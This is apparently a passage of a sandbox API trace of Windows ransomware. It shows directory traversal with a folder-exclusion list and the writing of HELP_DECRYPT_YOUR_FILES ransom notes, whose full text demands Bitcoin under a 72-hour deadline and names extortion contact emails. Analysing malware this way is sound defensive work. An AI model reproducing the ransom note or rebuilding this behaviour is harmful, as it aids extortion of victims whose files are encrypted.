	[0169.617] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="temp") returned 0x0
	[0169.617] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.617] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="program files") returned 0x0
	[0169.617] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.617] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="program files (x86)") returned 0x0
	[0169.617] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.618] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="appdata") returned 0x0
	[0169.618] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.618] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="application data") returned 0x0
	[0169.618] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.690] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="winnt") returned 0x0
	[0169.690] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.691] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="tmp") returned 0x0
	[0169.691] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.691] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="cache") returned 0x0
	[0169.691] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.691] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="temporary internet files") returned 0x0
	[0169.691] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.692] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="webcache") returned 0x0
	[0169.692] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.692] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="inetcache") returned 0x0
	[0169.692] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.692] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="nvidia") returned 0x0
	[0169.692] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.693] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="packages") returned 0x0
	[0169.693] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.693] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="cookies") returned 0x0
	[0169.693] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.693] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="programdata") returned 0x0
	[0169.693] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0169.694] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0169.694] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7ea033c6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0169.694] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0169.694] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ea033c6, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7ea033c6, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7ea033c6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0169.694] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e9dd28d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e9dd28d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7ea033c6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0169.694] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e9dd28d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e9dd28d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7ea033c6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0169.694] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0169.695] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0169.695] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoftLandingStage", cAlternateFileName="SOFTLA~2")) returned 1
	[0169.695] lstrcmpW (lpString1="SoftLandingStage", lpString2="..") returned 1
	[0169.695] lstrcmpW (lpString1="SoftLandingStage", lpString2=".") returned 1
	[0169.695] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis"
	[0169.695] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\"
	[0169.696] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\", lpString2="SoftLandingStage" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage"
	[0169.696] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage"
	[0169.696] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\"
	[0169.696] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\"
	[0169.696] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\*.*"
	[0169.696] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0169.698] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\*.*") returned 59
	[0169.698] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0169.698] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\*.*", cchLength=0x3b | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*") returned 0x3b
	[0169.698] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.698] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="windows") returned 0x0
	[0169.698] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.699] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="boot") returned 0x0
	[0169.699] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.699] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="system volume information") returned 0x0
	[0169.699] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.699] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0169.699] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.700] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="temp") returned 0x0
	[0169.700] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.700] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="program files") returned 0x0
	[0169.700] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.700] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="program files (x86)") returned 0x0
	[0169.700] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.701] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="appdata") returned 0x0
	[0169.701] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.701] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="application data") returned 0x0
	[0169.701] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.701] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="winnt") returned 0x0
	[0169.701] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.702] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="tmp") returned 0x0
	[0169.702] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.702] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="cache") returned 0x0
	[0169.702] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.702] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="temporary internet files") returned 0x0
	[0169.702] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.702] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="webcache") returned 0x0
	[0169.703] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.703] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="inetcache") returned 0x0
	[0169.703] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.703] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="nvidia") returned 0x0
	[0169.703] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.703] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="packages") returned 0x0
	[0169.703] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.704] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="cookies") returned 0x0
	[0169.704] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.704] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="programdata") returned 0x0
	[0169.704] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0169.704] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0169.705] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0169.705] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0169.705] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage"
	[0169.705] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\*.*"
	[0169.706] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0169.706] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0169.706] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\HELP_DECRYPT_YOUR_FILES.TXT") returned 83
	[0169.706] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0169.707] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0169.707] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0169.710] CloseHandle (hObject=0x388) returned 1
	[0169.711] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0169.711] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0169.712] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0169.738] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0169.738] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0169.739] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0169.739] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0169.739] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0169.740] CloseHandle (hObject=0x388) returned 1
	[0169.740] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0169.741] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0169.741] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0169.741] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\HELP_DECRYPT_YOUR_FILES.HTML") returned 84
	[0169.741] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0169.742] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0169.742] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0169.746] CloseHandle (hObject=0x388) returned 1
	[0169.747] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0169.747] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0169.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0169.748] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0169.749] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0169.749] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0169.750] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0169.750] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0169.750] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0169.750] CloseHandle (hObject=0x388) returned 1
	[0169.751] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7eb34775, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0169.751] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\*.*") returned 59
	[0169.751] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0169.752] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\*.*", cchLength=0x3b | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*") returned 0x3b
	[0169.752] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.752] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="windows") returned 0x0
	[0169.752] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.752] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="boot") returned 0x0
	[0169.752] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.752] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="system volume information") returned 0x0
	[0169.753] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.753] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0169.753] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.753] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="temp") returned 0x0
	[0169.753] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.753] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="program files") returned 0x0
	[0169.754] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.754] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="program files (x86)") returned 0x0
	[0169.754] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.754] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="appdata") returned 0x0
	[0169.754] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
